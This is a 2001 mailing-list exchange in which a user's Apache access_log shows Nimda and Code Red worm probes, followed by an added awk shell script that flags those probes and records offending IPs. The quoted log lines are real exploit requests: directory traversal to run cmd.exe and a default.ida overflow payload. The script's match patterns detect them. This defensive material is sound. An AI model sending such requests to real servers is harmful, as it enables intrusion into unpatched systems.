Looks like you have two types of scum in there: Nimda and one of the two
Red Code versions. I have a sed and awk combo using a named-fifo at home
that will filter out the junk and log offending IP numbers and
timestamps *on the fly*.
I'm still not sure what to do with that information though...
Matt
On Thu, 2001-09-20 at 16:27, Jason Montleon wrote:
> Is anyone else getting stuff like this in their access_log? I have 2.6 MB
> built up since Tuesday of nothing but this garbage and my cable modem has
> been blinking a lot of activity. Am I to assume that this is Nimda?
>
> Jason
>
> -------------------------------------------------------------------------------------
> 65.96.30.122 - - [20/Sep/2001:16:54:07 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:08 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:12 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:15 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:16 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:16 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:17 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:18 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:18 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:19 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:20 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:23 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:24 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:24 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:41 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:42 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:47 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.105.9 - - [20/Sep/2001:17:07:39 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:04 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:17:13:12 -0400] "-" 408 - "-" "-"
> -------------------------------------------------------------------------------------
> _______________________________________________
> Seawolf-list mailing list
> [EMAIL PROTECTED]
> https://listman.redhat.com/mailman/listinfo/seawolf-list
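The on-the-fly filter Matt describes (pick the worm probes out of access_log, record the offending IP and timestamp, let the rest through) in working form. This is an added example, not Matt's sed/awk/fifo script; it assumes Apache's common or combined LogFormat (client IP in field 1, "[timestamp" in field 4, request path in field 7) and uses a handful of lines from Jason's quoted log as sample input, with the Code Red request shortened and one made-up legitimate request from the documentation range 192.0.2.0/24 added so the pass-through case is exercised too.

```shell
#!/bin/sh
# Added example (not Matt's script): an awk filter that picks the Nimda and
# Code Red probes out of an Apache access_log, records "<ip> <timestamp> <family>"
# for each, and passes everything else through untouched.
# Assumes the common/combined LogFormat (IP in $1, "[timestamp" in $4, request
# path in $7); adjust the field numbers for other formats or proxy logs.

# scan_log MODE: read access_log lines on stdin.
#   MODE=hits  -> print "ip timestamp family" for each worm probe
#   MODE=clean -> print only the lines that matched no signature
scan_log() {
    awk -v mode="$1" '
    {
        req = tolower($7)   # "GET <path> HTTP/1.0" -> the path; a bare "-" 408 line has none
        fam = ""
        # Code Red / Code Red II: the .ida overflow probe against default.ida
        if (index(req, "/default.ida?"))                          fam = "codered"
        # Nimda: root.exe backdoor plus the traversal-encoded cmd.exe variants
        else if (index(req, "root.exe") || index(req, "cmd.exe")) fam = "nimda"
        if (fam != "") {
            if (mode == "hits") { ts = $4; sub(/^\[/, "", ts); print $1, ts, fam }
        } else if (mode == "clean") {
            print
        }
    }'
}

worm_hits() { scan_log hits; }
clean_log() { scan_log clean; }

# offenders: one line per probing IP with its probe count, sorted by IP
offenders() { worm_hits | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' | sort; }

# Constructed sample: four lines copied from the quoted access_log (the Code Red
# request shortened; the real one carries 224 X's before the %u payload), the
# 408 timeout line, and one made-up legitimate request.
SAMPLE_LOG='65.96.30.122 - - [20/Sep/2001:16:54:07 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
65.96.30.122 - - [20/Sep/2001:16:54:15 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
65.96.30.122 - - [20/Sep/2001:16:54:20 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
65.96.105.9 - - [20/Sep/2001:17:07:39 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 278 "-" "-"
65.96.68.80 - - [20/Sep/2001:17:13:12 -0400] "-" 408 - "-" "-"
192.0.2.10 - - [20/Sep/2001:17:15:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.7"'

# Batch use on the sample. For a live feed, create a fifo with mkfifo, point
# Apache's CustomLog at it, and run:  worm_hits < access.fifo >> offenders.log &
printf '%s\n' "$SAMPLE_LOG" | worm_hits
printf '%s\n' "$SAMPLE_LOG" | offenders
```

On the sample this prints three nimda hits for 65.96.30.122, one codered hit for 65.96.105.9, and the per-IP totals; the 408 line and the index.html request fall through to `clean_log`. Matching on the request path rather than on whole-line substrings keeps a referrer or user-agent that happens to contain "cmd.exe" from tripping the filter, and lowercasing the path catches mixed-case variants of the same probe.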